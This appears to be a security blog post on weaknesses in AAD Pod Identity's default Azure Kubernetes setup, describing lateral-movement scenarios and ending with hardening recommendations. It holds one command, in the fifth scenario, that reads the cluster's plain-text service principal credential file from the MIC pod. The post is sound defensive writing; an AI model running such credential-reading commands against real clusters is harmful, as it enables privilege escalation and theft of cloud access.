Using AAD Pod Identity in your Azure Kubernetes Clusters — what to watch out for!

A few points on how to connect pods to azure services, without compromising your security in the process.

TL;DR: The default implementation of AAD Pod Identity may not be secure enough for some types of environments/workloads. If you care about security, you will need to go beyond “kubectl apply -f…”.

Azure has been improving its products to support contextual authentication. This is powered by a feature called Managed Identities, which, in simple terms allows you to assign an identity to a Azure Compute (i.e. AKS, Virtual Machine, App Service, etc). Applications inside that compute can then request access tokens to access other Azure Services, such as a Sql Azure database or KeyVault instance.

Without going into too much detail, this is based on the Azure Instance Metadata API. A HTTP end-point which returns a new access token when called inside an Azure compute with this feature enabled. The URL for calling it looks like this:

In this case specifically, instead of having a connection string in your application with a “fixed” user name and password for your database, you would instead use an access token generated at run-time. An example from the official documentation on setting this for an App Service and Sql Azure can be found here.

The idea is quite interesting and provides a few security benefits for your applications, such as:

Contextual security: access to azure resources are based on access tokens that can only be acquired from a Compute (AKS, Virtual Machine, App Service, etc) within azure. Therefore, this would effortlessly help you to keep your environments segregated. For consistency across all SDLC, you can even emulate this behaviour locally with their SDK.

access to azure resources are based on access tokens that can only be acquired from a Compute (AKS, Virtual Machine, App Service, etc) within azure. Therefore, this would effortlessly help you to keep your environments segregated. For consistency across all SDLC, you can even emulate this behaviour locally with their SDK. Less secrets to maintain, namely a decreased attack surface: No need to think about secret rotation for connection strings or SAS keys. Every token is generated automatically and on demand by the Instance Metadata API.

No need to think about secret rotation for connection strings or SAS keys. Every token is generated automatically and on demand by the Instance Metadata API. Automatic rotation of access tokens: Tokens provided have a time to live (TTL) which by default is 60 minutes. Then automatically rotated once expired.

Last year, Microsoft started an open source project to bring this concept to Kubernetes clusters, allowing you to bind an Azure Managed Identity to a running Pod, its name is aad-pod-identity.

To make the security concerns raised here clearer, we will consider a multi-workload cluster, shared among at least two different teams. Each one of them being responsible for their own pipelines, namespaces (within the cluster) and resource groups (within Azure), all properly configured and with least privileges in mind.

The green box represents the cluster control plane, whilst the blue box represents Azure control plane. The red dotted rectangle represents what Team A should have access to, whilst the blue is the same for the Team B.

The idea behind the approach above is to implement security in depth. Ensuring that if any point gets compromised, it stays contained within its vicinity and doesn’t take over the entire cluster or Azure resources. There are a lot of things that need to be put in place in order to attain that, which goes beyond this post. The goal here is to highlight where AAD Pod Identity may make it harder to attain that.

How does AAD Pod Identity Work?

Before going any further, it’s important to first understand how it all fits together.

Once deployed, aad-pod-identity will add a few new things into your cluster:

NMI

Node Managed Identity is a daemonset, that hijacks (yes, this is pretty much the same as a man-in-the-middle attack) all calls to Azure’s Instance Metadata API from each node, processing them by calling MIC instead.

MIC

Managed Identity Controller is a pod that invokes Azure’s Instance Metadata API, caching locally tokens and the mapping between identities and pods.

AzureIdentity

A new Customer Resource type that represents an Azure Identity inside Kubernetes.

AzureIdentityBinding

A new Customer Resource type that links Azure Identities to Pods inside the cluster, using labels.

A sample application would look like this:

There are a few things worth noting;

The association between the AzureIdentity and the Pod, that is made through labels. The current version requires AzureIdentity and AzureIdentityBinding objects to reside in the default namespace. There is work in progress to allow them to be namespaced, however, it hasn’t landed as yet.

Scenarios to Watch-out for

Here are the scenarios that could lead to lateral movement and privilege escalation by abusing the default settings of this project.

Some of these considerations may or may not be relevant to you. This will largely depend on your security posture, and your use case. For example, if you only have a single application within your cluster, a single Azure Identity shared across all applications, or if in general “least privilege” is not high in your priority list. :)

1) Re-using binding selector

By re-using the same value for the aadpodidbinding label in the customer-pod, a rogue pod would be linked to the customer identity. Now if it requests for an access token from the Instance Metadata API, it will be granted one that allows it to do any actions that Customer Identity is allowed in Azure:

In this scenario, a compromised account with read access to the default namespace and create pod access anywhere else within the cluster, would be able to acquire access tokens on behalf of the Customer Manager Identity.

What makes this more likely to happen, is the fact that both AzureIdentity and its binding are in a shared namespace. Which can mean that multiple teams/applications will have access to it, even if just as read-only.

2) Creating a new Azure Identity Binding

Similarly to the scenario above, a new AzureIdentityBinding can be created, linking to the existing customer AzureIdentity.

At this point in time, the AzureIdentityBinding object must be created in the default namespace. Once namespaces are supported, it could also be deployed in other namespaces, if the annotation forceNamespaced is not set to true.

In this case, the compromised account trying to move laterally would need pod read and AzureIdentity/Binding write accesses to the default namespace and also create pod access anywhere else within the cluster.

3) Creating a new AzureIdentity and AzureIdentityBinding

Another version of the scenario above. This time creating both an AzureIdentity and AzureIndentityBinding, however, pointing to the Managed Identity in the prod-customer-rg resource group.

Access permissions and threat vectors would be pretty similar to the previous scenario.

4) Eavesdropping requests to NMI

The NMI pod “intercepts” all the requests to the Instance Metadata API, and handles it internally. However, none of this traffic is sent using a secure channel (TLS). The access tokens in always transported in plain-text.

Privileged pods with NET_ADMIN capabilities can eavesdrop network traffic on anything scheduled on the same node, which could benefit from plain-text sensitive information being sent around. It is actually worse on this case, that the end-point address is well-known.

Note that if the cluster is configured to have Managed Identity enabled, the NMI pod will talk with the Azure Instance Metadata. If it is not, it will talk with Azure AD instead, in which case, part of that communication would be under TLS (from nmi to Azure AD) and part of it won’t (from requesting pod to nmi).

This is a bit more complicated than the previous scenarios, although it only requires the compromised account to have create pod access. There must be nothing blocking the creation of privileged pods — which is the default behaviour.

Note that it does not matter what namespace the rogue pod is deployed. A privileged pod goes beyond that level of isolation, and will have access to all the traffic within the node it was scheduled in.

5) Access to AKS credentials

Currently AKS stores in plain-text the SPN (Service Principal Name) credential used for the cluster to talk with the Azure API. This file is physically available within each and every node. This is a known issue and I blogged about it a while ago.

The MIC pod mounts that file into itself, therefore, any user (or service account) with execute access on MIC has access to it with a single line:

kubectl exec MIC-NAME -- cat /etc/kubernetes/azure.json

Note that the existing template provided on the aad-pod-identity places all its components in the default namespace.

The threat vector here is any user, or service account, which has pod execute access in the default namespace would be able to privilege escalate to at least have access to all Azure resources that the cluster has. For example, it could manipulate the node VMs, load balancer, Network Security Groups (NSGs), etc.

This can also be a problem on AKS-Engine, if it was setup with useManagedIdentity = false.

Recommendations

The overall concern here is “how easy” lateral movement between the cluster Control Plane and the Azure Control Plane can be achieved, for a non-admin user, after all, none of the scenarios above requires clusterAdmin rights.

The recommendations below covers the scenarios mentioned above for the implementation of AAD Pod Identity. But it also focuses on improving the isolation within the cluster. Here it goes:

Do not store sensitive resources in Kubernetes namespaces that are shared across applications. If you do, ensure you have granular permissions to ensure Roles only have access to what they really need.

Tightly control the RBAC of your cluster. Closely monitor the change of Roles and RoleBindings (and their cluster level counter-parts).

Use PodSecurityPolicies to restrict the creation of privileged pods.

Closely monitor privileged pods for suspicious behaviour.

Lock down AzureIdentity and AzureIdentityBinding objects to their application namespaces. Also setting forceNamespaced=true, once that feature is available. Making it look like this:

After thoughts…

Almost two decades ago it was quite common to find references to SD3+C in Microsoft’s security literature. That concept was a shorthand for: Secure by Design, Secure by Default, Secure in Deployment, and Communications. Basic concepts which meant a more holistic view to security in software development.

That concept was as valid then, as it is now, especially when security is high on your priority list. However, it is clear that Secure by Default is not “top of mind” in quite a few open source projects (including Kubernetes), which then requires a lot more know-how from end-users to implement them securely.